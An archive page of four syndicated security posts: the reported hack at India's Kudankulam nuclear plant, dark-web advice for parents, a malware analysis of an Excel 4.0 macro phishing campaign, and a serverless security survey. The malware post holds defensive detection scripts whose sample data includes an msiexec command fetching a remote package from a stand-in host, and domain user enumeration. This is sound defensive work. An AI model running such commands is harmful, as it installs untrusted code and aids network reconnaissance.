Daily Archives: November 2, 2019

#cybersecurity | #hackerspace | Analyst Discusses Reporting Hack Of Computer System At Indian Nuclear Reactor | Avast

Source: National Cyber Security – Produced By Gregory Evans

This week a report of hackers gaining access to an Indian nuclear power plant’s computer network led to alarm, confusion, and denial before officials admitted the hack took place. The threat analyst who reported the issue experienced a unique vantage point in the middle of that furious cybersecurity news cycle. 

Threat analyst Pukhraj Singh (pictured) reported the breach of the domain controller at the Kudankulam Nuclear Power Plant to India’s National Cyber Security Coordinator on Sept. 3, and follow-up emails were exchanged. But for nearly two months the government did not reveal the incident. When Singh disclosed the attack on Twitter on Oct. 28, the government appeared to deny it before confirming the attack a day later. 

The hack was tied to North Korea, and is comparable to a Russian hack of American facilities disclosed last year by the U.S. government. Given the impact of state-sponsored attacks on power grids and utilities, the Indian government’s confusing response was central to a swirl of conflicting news reports and social media. In the eye of the storm was Singh, the former government cybersecurity analyst who brought the hack forward to the government and the public. (Singh emphasizes that he did not discover the intrusion, but helped threat researchers who did not wish to be named.)

“My Twitter profile is flooded,” he said, including tweets that misinterpreted the intrusion to be a hack of the nuclear reactor itself. “I have been repeatedly trying to clarify that. It’s not my job or motive to figure out if the control systems were compromised.” The Indian government has said that the plant and other Indian nuclear power plant control systems cannot be hacked because they stand alone and are not connected to outside cyber networks or the Internet.

But Singh says “extremely mission-critical targets were hit” in an attack that could have involved high-level espionage. “A domain controller authenticates and authorizes other resources and entities on the network. It’s the most privileged vantage point attackers can have. The intruders sat on it. They were onto something – probably espionage.”

Singh says he is “not in a position to talk about the government’s response. I did notify the topmost echelon of the cyber establishment.” But he does say his biggest takeaway from the entire episode is that “Communication is the key. Responsible disclosure is a win, and a strategic maneuver to turn the tables against the adversary.”

Luis Corrons, a security evangelist for Avast, said keeping nuclear reactors’ energy-production systems offline is critical. “Thank God humans are aware of their limitations and nuclear reactors are not connected to the Internet. But computer networks like this one and other industries and facilities are increasingly connected to the Internet, and public safety is involved. An example was the attacks suffered in Ukraine where portions of the population were without electricity in winter because of a cyberattack. Mr. Singh is correct: Information is the key, and government officials have a responsibility to keep citizens apprised of events as much as national security allows.” 

Learn more about how nations hack each other and how to respond to a data breach on The Avast Blog. You can find resources on national security cyberthreats and sign up for security alerts with the U.S. Cybersecurity and Infrastructure Security Agency.


The post #cybersecurity | #hackerspace | Analyst Discusses Reporting Hack Of Computer System At Indian Nuclear Reactor | Avast appeared first on National Cyber Security.





#deepweb | Protect your kids from the rabbit hole of the dark web


The dark web is that unregulated corner of the cyberspace where illegal deals and criminal schemes are hatched. It is also easily accessible to children, which should give parents serious cause for concern.

 

The Internet is a huge playground that sees data, devices, and people interacting on an unparalleled scale. It is informative and helpful, but, just like a physical playground, there is scope for damage in the online realm, especially for younger users who might not be fully aware of the danger that lurks just beneath the surface: the dark web.

What is the dark web and why is it dangerous?

As the name suggests, the dark web is the darker aspect of the digital world that we are oh-so-familiar with today. It derives its existence from the deep web, which, in its original form, was supposed to be an unindexed portion of the cyberspace that provided users with anonymity and privacy. The lack of visibility and regulation that exemplified the dark web, however, was taken advantage of by malicious actors to create something far more dangerous and nefarious.

Today, the dark web is a place where all kinds of criminals and less savoury elements of society come together to buy, sell and share everything illegal and unethical in the real world. In those shadowy corners of the World Wide Web thrive dangers ranging from identity theft and narcotics/weapons trade, to suicide chatrooms and child pornography.

Take the “Blue Whale Challenge”, for instance, which preyed on the need for peer acceptance in young children. It lured users in with innocuous tasks that progressively became riskier and more damaging, with elements of self-harm, cyberbullying, and online shaming involved. The phenomenon is thought to be responsible for several unrelated suicides amongst children and young adults globally.

Imagine your child exposed to such a harmful influence. Not a pleasant thought at all, is it?

What makes the dark web all the more dangerous is the ease with which it can be accessed. Private networks like Tor (The Onion Router) and I2P (Invisible Internet Project) give young children a gateway into the horrific and alluring content in the depths of the dark web. Unbeknownst to their parents, kids often dive deep down into this secret yet dangerous rabbit hole through their PCs, laptops, and smartphones, unmonitored, unregulated and unnoticed.

So, if you want to prevent your child from being exposed to such harmful influences, here are a few measures that you can implement to protect them against the dangers of the dark web.

Keep a check: While your ward’s privacy should be valued and respected, as a parent, you also have to don the hat of a regulator and protector. This makes it important for you to constantly check their digital devices and the kind of software, applications and tools that they use—especially those which require TOR or I2P access. It is also advisable to monitor your child’s online time and activities, whom they interact with, and their behaviour.

Educate and talk to your children: Young children typically seek attention elsewhere when they feel they’re not getting enough at home. This is why you must spare some time to initiate friendly conversations with your children. Talk to them about their likes/dislikes, interests and concerns, as well as any new developments in their lives, in a non-intrusive manner. This will help you develop a comfortable equation that encourages your child to be more forthcoming with you and will allow you to educate them about critical issues, such as narcotic use, sex education, bullying, online information sharing and violent behaviour.

Take them out for a digital detox: Today, we spend more time with digital devices than ever before. Your kids, if anything, are even more addicted to technology. This is why it is important to help them break away from their screens by undertaking simple yet relaxing physical activities. It could be spending time as a family, learning a new hobby, or just a walk in the park. If you begin inculcating this habit from a young age, you won’t even know when it becomes a part and parcel of their everyday lives.

Stay in touch with them through smart gadgets: Yes, you heard it right. Smartwatches that connect you to your child’s phone through an app are indeed a good way to track their activities. You can buy such smartwatches online or in gadget showrooms nearby and be the digitally-savvy parent that your child needs and deserves.

Monitor their online purchases: If you’ve given your child a credit/debit card of their own, it is always best to link it to your account. This gives you visibility into any online transactions that your child makes, as well as where they are making their purchases from. It is also advisable to keep track of their online orders and empty delivery cartons. Also, check if your ward has access to anonymous currencies such as bitcoin; this can be easily gauged by tracking the package details and mode of payment.

The Internet, like most things in life, is both a boon and a curse. In the right hands and with the right guidance, it can be a pathway to unparalleled opportunities for learning and growth. Without proper regulation, however, it can be extremely destructive and may negatively impact your child’s future. As a modern parent, it is your responsibility to ensure that young children remain protected from the various threats online—and following the aforementioned tips might just help you save your young one from walking the harrowing path of the dark web.

The author is founder and director, Shemford Group of Futuristic Schools

 


The post #deepweb | Protect your kids from the rabbit hole of the dark web appeared first on National Cyber Security.





#cybersecurity | Attacker uses tricky technique of Excel 4.0 in Malspam campaign


The use of phishing emails in cyber-attacks is not new, and it is still one of the classic strategies for compromising a victim’s machine. Cyber criminals lure victims into opening email attachments (mostly DOC and XLS files) by making them look important, using keywords like invoice, payment, finance, order, etc. Quick Heal Security Labs observed one such attack.

Overview:

In this attack, the attacker first sends a phishing email disguised as an important one and containing an Excel document as an attachment. Here is a phishing email which was tracked during this research.

Fig.1: Phishing email with excel file as attachment

On opening this Excel document, the victim is asked to “enable macro” content, which executes malicious VBA macro code in the background.

Fig.2: Prompt requesting to enable Macros

The use of VBA macros in phishing attacks has been rising, and this trend is not new. There are ways to detect such attacks easily. Hence attackers have changed their exploitation technique and are using Excel 4.0 macros these days.

The Excel 4.0 macro technique is old but still effective, as all versions of Excel can run Excel 4.0 macros. In this technique, macros are not stored in a VBA project but are placed inside the cells of a spreadsheet, using functions like Exec(), Halt(), Auto_Open(), etc. To trick the victim, attackers use the sheet-hiding feature of the spreadsheet and store the macros inside a hidden sheet.

The following example shows that the actual macro code is hidden inside another Excel sheet; using the Unhide option, that sheet can be seen, as shown in Fig. 3.

Fig.3: Unhiding Excel Sheet
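The hidden-sheet trick described above leaves a trace in the file itself, so it can be checked without opening the workbook in Excel. The following is an added example, not code from the original analysis: it walks the BIFF8 records of an .xls Workbook stream and reports Excel 4.0 macro sheets that are hidden, plus the built-in Auto_Open name. It assumes the Workbook stream has already been extracted from the OLE container; the function names and the sample stream are constructed for illustration.

```python
import struct

BOUNDSHEET, LBL, EOF = 0x0085, 0x0018, 0x000A
STATE = {0: "visible", 1: "hidden", 2: "very hidden"}
KIND = {0: "worksheet", 1: "xl4-macro", 2: "chart", 6: "vba-module"}

def records(stream):
    """Walk BIFF records: 2-byte type, 2-byte length (little endian), payload."""
    pos = 0
    while pos + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, pos)
        if pos + 4 + rlen > len(stream):
            break  # truncated record: stop rather than parse garbage
        yield rtype, stream[pos + 4:pos + 4 + rlen]
        pos += 4 + rlen

def scan_globals(stream):
    """Inventory sheets and flag hidden Excel 4.0 macro sheets and Auto_Open."""
    sheets, auto_open = [], False
    for rtype, data in records(stream):
        if rtype == EOF:  # end of the workbook-globals substream
            break
        if rtype == BOUNDSHEET and len(data) >= 8:
            cch, wide = data[6], data[7] & 1
            raw = data[8:8 + cch * (2 if wide else 1)]
            name = raw.decode("utf-16-le" if wide else "latin-1", "replace")
            sheets.append({"name": name,
                           "state": STATE.get(data[4] & 3, "unknown"),
                           "kind": KIND.get(data[5], "other")})
        elif rtype == LBL and len(data) >= 16:
            builtin = struct.unpack_from("<H", data)[0] & 0x0020
            if builtin and data[15] == 0x01:  # built-in name id 1 = Auto_Open
                auto_open = True
    hidden = [s["name"] for s in sheets
              if s["kind"] == "xl4-macro" and s["state"] != "visible"]
    return {"sheets": sheets, "auto_open": auto_open,
            "hidden_macro_sheets": hidden}

# --- constructed sample stream (not taken from the campaign's file) ---
def _rec(rtype, payload):
    return struct.pack("<HH", rtype, len(payload)) + payload

def _sheet(name, state, kind):
    head = struct.pack("<IBBBB", 0, state, kind, len(name), 0)
    return _rec(BOUNDSHEET, head + name.encode("latin-1"))

SAMPLE = (_rec(0x0809, bytes(16))        # BOF
          + _sheet("Sheet1", 0, 0)       # visible worksheet
          + _sheet("Macro1", 1, 1)       # hidden Excel 4.0 macro sheet
          + _rec(LBL, struct.pack("<HBBHHH4x", 0x20, 0, 1, 0, 0, 1) + b"\x00\x01")
          + _rec(EOF, b""))

if __name__ == "__main__":
    print(scan_globals(SAMPLE))
```

A workbook that reports both a hidden macro sheet and Auto_Open is worth quarantining for analysis before any user is asked to enable content.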

 

The figure below shows the exact code and the flow of execution.

Fig.4: Macro Code Execution

Auto_Open() is a function used to execute code as soon as the workbook is opened.

As seen in Fig. 4, the Auto_Open function executes Macro1(), which means code execution starts from Row 4, which is Macro1. After that, it calls Macro2 (step 2), and then the next instruction, which is 33 (on Row 14), is executed. In step 3, the 1st stage payload is downloaded to the %temp% folder using the msiexec.exe process, as shown in Fig. 5.

While msiexec.exe is a legitimate Microsoft process belonging to the Windows Installer component, it is one of the living-off-the-land binaries. Attackers use this process to download the payload because many security solutions treat it as a whitelisted process, which makes the activity difficult to detect using behaviour-detection techniques.

Fig.5: Download of 1st Stage Payload

 

Executable Analysis:

After downloading the payload, msiexec.exe is also responsible for executing it and performing further activity. The 1st stage payload is just a dropper, used to drop multiple files in the %temp% folder. Finally, it drops a .dll file which acts as the final stage payload and is used to perform further malicious activities.

The final stage payload is executed by Rundll32.exe with the function name “sega” as its argument. It starts collecting system information such as the number of running tasks, the system ID, whether the user is part of a domain, drive usage, etc.

Fig.6: Execution flow of Attack

The final payload drops a PowerShell script which checks whether the user is part of a domain. The dropped PowerShell script is stored in the %temp% location in obfuscated form.

After collecting the required information from the victim’s machine, the payload encodes the data using simple URL encoding and sends it to its C2 server using the POST method.

Fig. 7: Data sent using POST method

Here is the screenshot of the decoded data:

Fig. 8: Decoded data

The C2 server responds with a command after getting the details.

Depending on the response, the payload performs an action on the victim’s machine: it executes net.exe with the command “net user /domain”, collects the information and sends it back to the C2 server.

Some of the following functions are used while sending data to the C2 server.

Fig. 9: C2 communication API calls

This payload also creates a global mutex so that only one instance of the payload runs at a time.

Fig. 10: Create global mutex

The main purpose of this malware is to create a backdoor which can be used to steal system data; if the system is in a domain, it may perform lateral movement to create a backdoor network.
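Because msiexec.exe, rundll32.exe and net.exe are all legitimate binaries, the chain described above is easier to catch by process lineage than by file name. The following added example (not part of the original analysis) applies three lineage rules to process-creation events; the event fields, the parent/child ordering in the sample and all sample values are constructed assumptions, and only the “sega” export and the “net user /domain” command come from the write-up.

```python
import re

URL = re.compile(r"https?://", re.I)
TEMP_DLL = re.compile(r"\\temp\\[^\\]+\.dll", re.I)
NET_DOMAIN = re.compile(r"\buser\b.*/domain\b", re.I)

def exe(image):
    """Lower-case file name of a process image path."""
    return image.rsplit("\\", 1)[-1].lower()

def ancestors(event, by_pid):
    """File names of every ancestor process, nearest first (loop-safe)."""
    names, seen = [], set()
    while event["ppid"] in by_pid and event["ppid"] not in seen:
        seen.add(event["ppid"])
        event = by_pid[event["ppid"]]
        names.append(exe(event["image"]))
    return names

def detect(events):
    """Return (pid, reason) for each event that matches a lineage rule."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name, cmd, chain = exe(e["image"]), e["cmdline"], ancestors(e, by_pid)
        if name == "msiexec.exe" and URL.search(cmd) and "excel.exe" in chain:
            alerts.append((e["pid"], "Excel spawned msiexec with a remote package"))
        elif (name == "rundll32.exe" and TEMP_DLL.search(cmd)
              and "msiexec.exe" in chain):
            alerts.append((e["pid"], "rundll32 ran a %temp% DLL below msiexec"))
        elif (name in ("net.exe", "net1.exe") and NET_DOMAIN.search(cmd)
              and "rundll32.exe" in chain):
            alerts.append((e["pid"], "domain user enumeration below rundll32"))
    return alerts

# --- constructed sample events: (pid, ppid, image, command line) ---
S, T = r"C:\Windows\System32", r"C:\Users\u\AppData\Local\Temp"
ROWS = [
    (100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    (200, 100, r"C:\Program Files\Microsoft Office\EXCEL.EXE", "EXCEL.EXE invoice.xls"),
    (300, 200, S + r"\msiexec.exe", "msiexec.exe /i http://example.invalid/a.msi /q"),
    (400, 300, T + r"\stage1.exe", "stage1.exe"),
    (500, 400, S + r"\rundll32.exe", "rundll32.exe " + T + r"\x.dll,sega"),
    (600, 500, S + r"\net.exe", "net user /domain"),
    # benign look-alikes: local MSI install, administrator typing the command
    (700, 100, S + r"\msiexec.exe", r"msiexec.exe /i C:\setup.msi"),
    (800, 100, S + r"\cmd.exe", "cmd.exe"),
    (810, 800, S + r"\net.exe", "net user /domain"),
]
EVENTS = [dict(zip(("pid", "ppid", "image", "cmdline"), r)) for r in ROWS]

if __name__ == "__main__":
    for pid, reason in detect(EVENTS):
        print(pid, reason)
```

The two benign look-alikes in the sample show why the rules key on ancestry: the same binaries and the same command line raise no alert when they are not descended from the Excel-to-msiexec chain.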

Conclusion:

Using social engineering tricks to compromise a victim is a typical method, and attackers keep changing their techniques to evade AV detection, using new ideas like Excel 4.0 macros and genuine Windows processes like msiexec.exe. Quick Heal and Seqrite enterprise security solutions protect their users from such malicious email attachments and can also help in identifying remote Command and Control server communication. So, remember to keep endpoint security solutions always updated.

IOCs:

78EA9835C2D7F6760315EA043807B8C8

34B769FA431AC1945BE9CC33D4CC2426

DDAE8B7AA9A93CE17610EB063F5838CE

6675C63A2534FD65B3B2DA751F2B393F

 

Subject Matter Expert:

Anjali Raut, Aniruddha Dolas

 

 


The post #cybersecurity | Attacker uses tricky technique of Excel 4.0 in Malspam campaign appeared first on National Cyber Security.





#cybersecurity | #hackerspace | State of Serverless and Security


Trends in Serverless Adoption

Serverless adoption has been increasing drastically over the past 18 months, outpacing other cloud infrastructure environments. Given this, Protego Labs has surveyed top security, development, and DevOps professionals from over 30 organizations to get their perspective on serverless adoption and the role security has played in this growth in The State of Serverless and Security Survey.

As seen in other research, AWS Lambda continues to lead the way for serverless deployments making up 84% of all serverless deployments. 35% of organizations surveyed said that their company spends more than 25% of their total IT budget on cloud technologies, and 82% agreed that their organization would benefit from further investment in the cloud across other areas of their organization. Market Research reports that the CAGR for serverless is 26% over the next five years, which supports the finding that 48% of those surveyed feel that serverless is the future of the cloud.

What about Serverless Security?

But where does this leave security, and are organizations ready to fully embrace serverless? In order to fully embrace serverless, 66% said that securing their serverless deployments is their top priority. And it is no wonder: with hundreds of functions to manage, having confidence in the security of each function is a daunting task. 53% of those surveyed state that they don’t have proper visibility into their serverless functions. This contributes to 68% of organizations not having confidence in the security of their serverless deployments.

So what does this mean? Serverless provides a great opportunity for organizations to expedite application development and save infrastructure expenses, but organizations must be prepared to view their application security risks in a new light. Managing serverless functions and analyzing code manually is not realistic – it is too easy for organizations to lose visibility and control. Luckily there are tools that allow organizations to streamline this process for greater visibility, security, and ultimately – regain control so they can fully embrace the opportunities of serverless. 

For more information on these tools, check out this short video to show how easy it is to build your compliance rules and restrictions into your serverless applications. 

 

The post State of Serverless and Security appeared first on Protego.

*** This is a Security Bloggers Network syndicated blog from Blog – Protego authored by Trisha Paine. Read the original post at: https://www.protego.io/state-of-serverless-and-security/


The post #cybersecurity | #hackerspace | State of Serverless and Security appeared first on National Cyber Security.
